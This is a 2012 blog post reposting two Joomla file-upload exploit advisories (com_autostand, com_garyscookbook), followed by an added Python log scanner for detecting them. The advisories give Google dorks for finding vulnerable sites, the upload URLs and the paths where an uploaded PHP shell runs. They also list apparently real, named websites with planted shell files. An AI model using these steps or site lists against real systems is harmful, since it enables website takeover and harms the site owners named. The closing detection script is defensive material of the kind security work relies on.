Friday, November 16, 2012

Joomla Exploit


# Exploit Title:  joomla com_autostand file upload
# Author: Over-X
# email: j1a@hotmail.de
# Vendor or Software Link: forum.joomla.org
# Version: v3
# Google dork: "inurl:com_autostand"
# Tested on: win Xp
-------------------------------------------------------------------------------
poc:
----
localhost/path/index.php?option=com_autostand&func=newItem
Upload a PHP shell, then go to:
--------------------------
localhost/path/images/autostand/images/shell.php
examples:
---------------------------------------------------------------------------------------
Gre: Sec4ever.com & Damane2011 & Invectus & Kha&mix & 4chrf & ked Ans & Black_Specter &
ms_dz & indoushka & jago-dz & L3b r1z & b0x & scorpion_tn


# Exploit Title: joomla com_garyscookbook file upload
# Author: Over-X
# email: j1a@hotmail.de
# Vendor or Software Link: www.joomla.it
# Version: 2_4_2
# Google dork: "inurl:com_garyscookbook"
# Tested on: win Xp
-------------------------------------------------------------------------------
poc:
----
localhost/path/index.php?option=com_garyscookbook&func=newItem
Upload a PHP shell, then go to:
--------------------------
localhost/path/components/com_garyscookbook/img_pictures/shell.php
1) http://www.kouzinapapanagiotou.gr/in...k&func=newItem
http://www.kouzinapapanagiotou.gr//c...es/dz-hp-0.php
2) http://oneiron.gr/index.php?option=c...k&func=newItem
http://oneiron.gr/components/com_gar.../dzdz-hp-0.php
3) https://www.vitamix.co.uk/index.php?...k&func=newItem
https://www.vitamix.co.uk//component...tures/help.php
--------------------------------------------------------------------------------
Gre: Sec4ever.com & Damane2011 & Invectus & Kha&mix & ked Ans & Black_Specter
ms_dz & indoushka & jago-dz & L3b r1z & b0x 
source : 1337day.com
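
Seen from the defender's side, both advisories leave the same two traces in a web server access log: a request to the component's func=newItem form, then a request for a script under that component's upload directory. The following is an added example, not part of the original advisories, that flags both stages; the Combined Log Format, the extension list, the sample IPs and the file names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Components and upload directories named in the two advisories.
UPLOAD_DIRS = {
    "com_autostand": "/images/autostand/images/",
    "com_garyscookbook": "/components/com_garyscookbook/img_pictures/",
}
# Extensions a PHP handler commonly executes (assumption; match your server config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Combined Log Format (assumed): ip - - [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (ip, kind, component) for a suspicious log line, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    query = parse_qs(url.query)
    option = query.get("option", [""])[0]
    # Stage 1: the upload form the advisories point at.
    if option in UPLOAD_DIRS and query.get("func", [""])[0] == "newItem":
        return ip, "upload_form_" + method, option
    # Stage 2: a script requested from a directory the form writes into.
    path = unquote(url.path).lower()
    for component, directory in UPLOAD_DIRS.items():
        if directory in path and SCRIPT_EXT.search(path):
            return ip, "script_in_upload_dir_" + status, component
    return None

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Nov/2012:10:01:02 +0000] "GET /index.php?option=com_autostand&func=newItem HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Nov/2012:10:01:30 +0000] "POST /index.php?option=com_autostand&func=newItem HTTP/1.1" 200 812',
    '203.0.113.7 - - [16/Nov/2012:10:01:41 +0000] "GET /images/autostand/images/x.php HTTP/1.1" 200 64',
    '198.51.100.9 - - [16/Nov/2012:10:02:00 +0000] "GET /images/autostand/images/car1.jpg HTTP/1.1" 200 20480',
    '198.51.100.9 - - [16/Nov/2012:10:03:00 +0000] "GET /components/com_garyscookbook/img_pictures/a.PhP HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A script_in_upload_dir hit with status 200 is the one to triage first, since it means a script file exists in a directory the upload form writes to.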
